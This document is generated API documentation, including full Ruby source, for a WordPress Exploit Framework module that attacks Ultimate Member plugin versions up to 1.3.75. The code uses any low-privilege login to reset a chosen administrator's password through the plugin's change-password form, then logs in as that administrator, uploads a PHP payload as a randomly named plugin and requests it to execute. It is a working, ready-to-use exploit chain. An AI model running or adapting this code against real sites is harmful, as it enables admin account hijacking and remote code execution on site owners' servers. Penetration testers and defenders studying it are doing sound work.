Class: Wpxf::Exploit::UltimateMemberShellUpload

Inherits:
Module
  • Object
Includes:
Wpxf, Net::HttpClient, WordPress::Login, WordPress::Plugin
Defined in:
lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb

Constant Summary

Constants included from Net::HttpOptions

Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST

Constants included from WordPress::Options

WordPress::Options::WP_OPTION_CONTENT_DIR

Instance Attribute Summary

Attributes inherited from Module

#active_workspace, #event_emitter, #payload, #session_cookie

Attributes included from Options

#datastore, #options

Instance Method Summary

Methods included from WordPress::Plugin

#fetch_plugin_upload_nonce, #generate_wordpress_plugin_header, #upload_payload_as_plugin, #upload_payload_as_plugin_and_execute

Methods included from WordPress::Login

#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body

Methods included from Net::HttpClient

#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri

Methods included from Net::TyphoeusHelper

#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options

Methods included from Net::UserAgent

#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent

Methods included from Versioning::OSVersions

#random_nt_version, #random_osx_version

Methods included from Versioning::BrowserVersions

#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version

Methods included from Wpxf

app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version

Methods inherited from Module

#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option

Methods included from Db::Credentials

#store_credentials

Methods included from ModuleAuthentication

#authenticate_with_wordpress

Methods included from WordPress::Urls

#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc

Methods included from WordPress::Options

#wp_content_dir

Methods included from WordPress::Fingerprint

#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version

Methods included from Options

#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option

Methods included from OutputEmitters

#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning

Methods included from ModuleInfo

#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info

Constructor Details

#initialize ⇒ UltimateMemberShellUpload

Returns a new instance of UltimateMemberShellUpload.



# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 9

# Sets up the module: registers its descriptive metadata (name, description,
# authors, references, disclosure date) and the three options an operator must
# supply before #run can proceed.
#
# All three options are registered as required and no default value is set in
# code. NOTE(review): the description of +password_form_path+ mentions a
# default of /account/password/, but none is registered here — confirm whether
# that is intentional.
def initialize
  super

  module_info = {
    name: 'Ultimate Member <= 1.3.75 Shell Upload',
    desc: 'This module exploits a vulnerability that allows users of any level to change '\
          'the password of any user. The module requires you login with an account of any '\
          'level, which will then be used to change the specified admin users\' password. '\
          'The compromised admin account will then be used to store and execute the payload.',
    author: [
      'James Golovich', # Discovery and disclosure
      'rastating'       # WPXF module
    ],
    references: [
      ['WPVDB', '8688'],
      ['URL', 'https://ultimatemember.com/security-release-v1-3-76/']
    ],
    date: 'Dec 08 2016'
  }
  update_info(**module_info)

  # Where the plugin's change-password form lives relative to the target URI.
  form_path_option = StringOption.new(
    name: 'password_form_path',
    desc: 'The path of the change password form (default is /account/password/)',
    required: true
  )
  # Numeric WordPress user ID submitted in the form's user_id field.
  user_id_option = IntegerOption.new(
    name: 'admin_user_id',
    desc: 'The ID of the user to hijack the account of',
    required: true
  )
  # Login name used to authenticate once the password has been changed.
  username_option = StringOption.new(
    name: 'admin_username',
    desc: 'The username of the admin user to hijack the account of',
    required: true
  )

  register_options([form_path_option, user_id_option, username_option])
end

Instance Method Details

#admin_user_id ⇒ Object



# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 60

# Normalised value of the +admin_user_id+ option.
#
# @return [Object] the value returned by #normalized_option_value for this
#   option (the option is registered as an IntegerOption in #initialize)
def admin_user_id
  option_name = 'admin_user_id'
  normalized_option_value(option_name)
end

#admin_username ⇒ Object



# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 64

# Normalised value of the +admin_username+ option.
#
# @return [Object] the value returned by #normalized_option_value for this
#   option (registered as a StringOption in #initialize)
def admin_username
  option_name = 'admin_username'
  normalized_option_value(option_name)
end

#before_upload ⇒ Object



# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 90

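# Pre-upload step: submits the password change for the target account and then
# logs in with the new credential, storing the resulting cookie in
# +@admin_cookie+ for #upload_payload.
#
# A non-302 response (or no response object at all) is reported via
# #emit_error and treated as failure; the original code dereferenced +res+
# unconditionally, so a failed request would have raised instead of returning
# false. The nil guard mirrors the one already used in #execute_payload.
#
# @return [Boolean] true when the password change succeeded and the login
#   produced a cookie, false otherwise
def before_upload
  emit_info "Changing password for #{admin_username} to #{new_password}"
  res = execute_password_change

  unless res && res.code == 302
    status = res ? res.code : 'no response'
    emit_error "Password change returned status #{status}", true
    emit_error "Failed to change the password for #{admin_username}"
    return false
  end

  # new_password is memoised, so this is the same value that was submitted above.
  @admin_cookie = authenticate_with_wordpress(admin_username, new_password)
  !!@admin_cookie
end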

#check ⇒ Object



# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 48

# Vulnerability check: compares the plugin version advertised in the
# ultimate-member readme against 1.3.76, the first fixed release named in the
# module's reference URL.
#
# @return [Object] whatever #check_plugin_version_from_readme returns
def check
  plugin_slug = 'ultimate-member'
  fixed_version = '1.3.76'
  check_plugin_version_from_readme(plugin_slug, fixed_version)
end

#execute_password_change ⇒ Object



# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 76

# Posts the plugin's change-password form for +admin_user_id+ using the
# low-privilege +session_cookie+, setting the password to #new_password.
#
# The form field names are those the plugin expects; +timestamp+ is filled
# with a random 3-digit value.
#
# @return [Object] the response object returned by #execute_post_request;
#   the caller inspects its +code+
def execute_password_change
  target = password_form_url
  cookie = session_cookie

  form_fields = {
    '_um_password_change' => '1',
    'timestamp' => Utility::Text.rand_numeric(3),
    'user_password' => new_password,
    'confirm_user_password' => new_password,
    'user_id' => admin_user_id
  }

  execute_post_request(url: target, cookie: cookie, body: form_fields)
end

#execute_payload ⇒ Object



# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 115

# Requests +@payload_url+ (set by #upload_payload) and reports the response
# body via #emit_success when the request returned 200 with a non-blank body.
# A nil response or any other status is silently ignored.
#
# @return [Object, nil] the result of #emit_success, or nil when nothing was emitted
def execute_payload
  res = execute_get_request(url: @payload_url)
  return unless res && res.code == 200

  body = res.body
  emit_success "Result: #{body}" unless body.strip.empty?
end

#new_password ⇒ Object



# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 68

# Random password set on the target account, generated once and memoised in
# +@new_password+ so that the change request and the later login use the same
# value.
#
# Built from five segments: 3 alphanumeric, 1 lower-case letter, 2 digits,
# 1 upper-case letter, 3 alphanumeric — presumably to satisfy a password
# policy (NOTE(review): not verified against the plugin).
#
# @return [String] the memoised password
def new_password
  @new_password ||= [
    Utility::Text.rand_alphanumeric(3),
    Utility::Text.rand_alpha(1, :lower),
    Utility::Text.rand_numeric(2),
    Utility::Text.rand_alpha(1, :upper),
    Utility::Text.rand_alphanumeric(3)
  ].join
end

#password_form_url ⇒ Object



# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 56

# Absolute URL of the change-password form: the target's +full_uri+ joined
# with the raw +password_form_path+ option from the datastore.
#
# @return [Object] the result of #normalize_uri
def password_form_url
  form_path = datastore['password_form_path']
  normalize_uri(full_uri, form_path)
end

#requires_authentication ⇒ Object



# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 52

# Signals to the framework that this module needs a logged-in WordPress
# session (of any privilege level) before it can run.
#
# @return [Boolean] always true
def requires_authentication
  needs_login = true
  needs_login
end

#run ⇒ Object



# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 120

# Module entry point. Defers to the parent's +run+ first, then performs the
# password-change/login step (#before_upload), uploads the payload and
# requests it. Failure of either preliminary step aborts with false.
#
# Note that the return value of #upload_payload is not checked here, so the
# payload request is attempted even if the upload reported failure.
#
# @return [Boolean] false if the parent run or #before_upload failed, true otherwise
def run
  return false unless super && before_upload

  emit_info 'Uploading payload...'
  upload_payload

  emit_info "Executing the payload at #{@payload_url}..."
  execute_payload

  true
end

#upload_payload ⇒ Object



# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 105

# Uploads the payload as a plugin with random plugin and file names, using the
# +@admin_cookie+ obtained in #before_upload, and records the resulting URL in
# +@payload_url+ for #execute_payload.
#
# @return [Boolean] true if #upload_payload_as_plugin reported success,
#   false (after emitting an error) otherwise
def upload_payload
  plugin_name, payload_name = Array.new(2) { Utility::Text.rand_alpha(10) }
  @payload_url = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")

  uploaded = upload_payload_as_plugin(plugin_name, payload_name, @admin_cookie)
  emit_error 'Failed to upload the payload' unless uploaded
  uploaded ? true : false
end